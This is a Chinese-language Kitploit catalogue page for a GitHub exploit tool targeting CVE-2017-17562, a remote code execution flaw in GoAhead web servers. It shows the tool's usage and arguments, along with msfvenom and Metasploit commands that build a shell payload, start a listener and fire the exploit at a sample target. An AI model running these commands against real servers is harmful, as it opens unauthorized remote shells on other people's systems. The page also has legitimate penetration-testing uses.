Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
goahead-rce-exploit — CVE-2017-17562 漏洞的利用程序,可在 GoAhead(< v3.6.5)上实现 RCE,前提是启用了 CGI 且某个 CGI 程序为动态链接。 | Kitploit
工具/GitHubGitHub/nu11pointer/goahead-rce-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubnu11pointer/goahead-rce-exploit

goahead-rce-exploit

CVE-2017-17562 漏洞的利用程序,可在 GoAhead(< v3.6.5)上实现 RCE,前提是启用了 CGI 且某个 CGI 程序为动态链接。

查看仓库
812年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' 远程代码执行

针对 CVE-2017-17562 漏洞的利用工具,当 GoAhead(< v3.6.5)启用 CGI 且 CGI 程序为动态链接时,可实现 RCE。

使用方法

root@kitploit:~
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

依赖

root@kitploit:~
$ python3 -m pip install -r requirements.txt

注意!

你需先生成 Payload 并设置监听连接。
示例:
(攻击者:192.168.1.100 - 目标:192.168.1.200)

root@kitploit:~
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

随后,在另一个终端中运行此 Exploit,发送 Payload 以启动反向连接至监听器!

参数

root@kitploit:~
必需参数:
  --host HOST        运行 GoAhead Web 服务器的主机。
  --port PORT        运行 GoAhead Web 服务器的端口。默认:80
  --payload PAYLOAD  Payload 文件路径。

可选参数:
  --ssl              主机使用 SSL。
  --cgi LIST         用于发现 GoAhead 服务器上 CGI 脚本的路径列表。默认:paths.lst

示例

root@kitploit:~
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
下载工具